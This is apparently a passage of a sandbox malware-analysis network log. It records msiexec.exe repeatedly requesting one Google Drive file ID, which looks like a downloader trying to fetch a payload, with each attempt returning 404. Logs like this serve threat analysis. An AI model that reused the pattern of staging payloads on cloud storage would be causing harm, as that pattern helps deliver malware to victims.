                                                                Cookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
                                                                2025-01-11 03:35:15 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:35:15 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: script-src 'nonce-rR7FXw4PwZckF-sdmcG_kg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.551650142.250.185.2254431472C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:35:16 UTC460OUTGET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
                                                                2025-01-11 03:35:17 UTC1844INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgSZhZJgL3s8-ZzLMrmkLlDl3KAEoz3L-Dh8YUbJqLebUHiRPwCb7ZdjFe66S9unmbQN
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:35:16 GMT
                                                                Content-Security-Policy: script-src 'nonce-SVQ9pgjJG_R5fTc4_TV8rg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-11 03:35:17 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 74 6d 4e 48 4a 2d 6e 66 4c 7a 70 6d 41 66 6d 33 44 79 39 38 30 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="tmNHJ-nfLzpmAfm3Dy980w">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.551651142.250.181.2384431472C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:35:27 UTC418OUTGET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
                                                                2025-01-11 03:35:28 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:35:27 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy: script-src 'nonce-1e1hkn08GuonyiieO30JEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                7192.168.2.551652142.250.185.2254431472C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:35:28 UTC460OUTGET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
                                                                2025-01-11 03:35:29 UTC1844INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgQQpwiaxd-uF1uxgCyhpihgl_08KnbsAuan6Ld0Bj9PsNnrlpLYzMPVTokNG_SoUlBH
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:35:29 GMT
                                                                Content-Security-Policy: script-src 'nonce-fSC-Yk1TLtLhJkHZDmoHOw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-11 03:35:29 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4b 35 42 63 64 65 6a 49 69 34 74 45 77 76 4d 72 67 30 34 5a 6f 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="K5BcdejIi4tEwvMrg04Zow">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                8192.168.2.551653142.250.181.2384431472C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:35:39 UTC418OUTGET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
                                                                2025-01-11 03:35:40 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:35:40 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy: script-src 'nonce-GUZ6M4Zs3FMI9gBunfeJSQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                9192.168.2.551654142.250.185.2254431472C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:35:40 UTC460OUTGET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
                                                                2025-01-11 03:35:41 UTC1844INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgTHA9CgGaP4y0slLmXOP4oD-biiFoJmYwnJH5eHjexTjJIiwBXQs0QZJHIGPUHENY2D
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:35:41 GMT
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-5uS7Hw1NVV_5mLJLt-MUgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-11 03:35:41 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 45 66 65 5f 56 41 6f 57 67 75 30 63 30 47 62 6e 4a 48 39 46 69 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Efe_VAoWgu0c0GbnJH9FiA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                10192.168.2.551655142.250.181.2384431472C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:35:51 UTC418OUTGET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
                                                                2025-01-11 03:35:52 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:35:52 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: script-src 'nonce-DOW48a-4oy5ggIWn53OA8w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                11192.168.2.551656142.250.185.2254431472C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:35:53 UTC460OUTGET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
                                                                2025-01-11 03:35:53 UTC1844INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgQA-T4nkc0BwFfAmhjw1HDWsVgNcWHDNM_MGPC7LSnBm9gUTcmY_OboYX6c0htUiVlz
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:35:53 GMT
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-DQvb78jy30Klll2hUbmjYw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
